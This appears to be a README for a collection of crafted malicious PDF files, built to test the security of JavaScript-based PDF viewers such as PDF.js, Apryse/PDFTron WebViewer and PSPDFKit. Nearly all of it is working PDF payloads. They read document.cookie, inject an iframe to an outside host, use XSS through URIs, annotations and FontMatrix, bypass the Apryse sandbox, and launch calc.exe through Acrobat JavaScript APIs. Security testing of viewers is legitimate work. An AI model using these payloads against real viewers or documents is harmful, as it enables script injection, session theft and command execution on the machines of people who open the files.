A list of crafted malicious PDF files to test the security of PDF readers and tools.
Write-Up: JavaScript-based PDF Viewers, Cross Site Scripting, and PDF files
- Foxit PDF SDK For Web 7.5.0 (~600 weekly downloads)
- PDFTron WebViewer 7.2.0, 7.3.1, 8.6.1, 10.1.0, 10.7.2, 10.12.0 (~87k weekly downloads)
- PSPDFKit for Web 2021.4.1 (~13k weekly downloads)
- Syncfusion ej2-pdfviewer 20.2.40 (~6.8k weekly downloads)
- React PDF viewer 3.6.0 (~34k weekly downloads)
- PDF.js 4.1.392 (~2 million weekly downloads)
Line 31. Understand if Acrobat Javascript APIs are supported.
/JS (app.alert\(1\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor("document.write('<script>confirm(document.cookie);</script><iframe src=https://14.rs>');"))().next();)
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (data:text/html,<script>alert\(2\);</script>)
Line 177. Try to inject Javascript code using annotations.
<</Type /Annot /Rect [284.7745656638 581.6814031126 308.7745656638 605.6814031126 ] /Subtype /Text /M (D:20210402013803+02'00) /C [1 1 0 ] /Popup 15 0 R /T (\">'><details open ontoggle=confirm\(3\)>) /P 6 0 R /Contents (��^@"^@>^@'^@>^@<^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\(^@'^@X^@S^@S^@'^@\)^@>) >>
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (\">'><details open ontoggle=confirm\(2\)>)
Line 31. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.
/JS (app.alert\(1\); confirm\(2\); prompt\(document.cookie\); document.write\("<iframe src='https://14.rs'>"\);)
Line 69. Try to run remote commands on Windows.
/URI (file:///C:/Windows/system32/calc.exe)
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.openDoc("/C/Windows/System32/calc.exe");)
Line 69. Try to run remote commands on Windows.
/URI (START C:/\Windows/\system32/\calc.exe)
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.launchURL\("START C:/\Windows/\system32/\calc.exe", true\); app.launchURL\("javascript:confirm\(3\);", true\);)
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (javascript:confirm\(2\);)
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.launchURL\("/C/Windows/system32/calc.exe", true\); app.launchURL\("'><details open ontoggle=confirm\(3\);", true\);)
Line 50. Try to run arbitrary Javascript injected via annotation. It works on vulnerable Apryse PDF Webviewer versions.
/V (">'></div><details/open/ontoggle=confirm(document.cookie)></details>)
Line 19. Try to run arbitrary Javascript injected via FontMatrix. It works on vulnerable PDF.js versions. Proof-of-Concept created by Rob Wu and Thomas Rinsma.
<< /BaseFont /SNCSTG+CMBX12 /FontDescriptor 6 0 R /FontMatrix [ 1 2 3 4 5 (1\); alert\('origin: '+window.origin+', pdf url: '+\(window.PDFViewerApplication?window.PDFViewerApplication.url:document.URL\)) ] /Subtype /Type1 /Type /Font >>
Line 32. Javascript sandbox bypass in Apryse WebViewer SDK (10.9.x - 10.12.0) to run arbitrary embedded Javascript in PDFs.
/JS (app.alert\(1\); console.println\(delete window\); console.println\(delete confirm\); console.println\(delete document\); window.confirm\(document.cookie\);)
If you want to support me you can offer me a coffee ☕
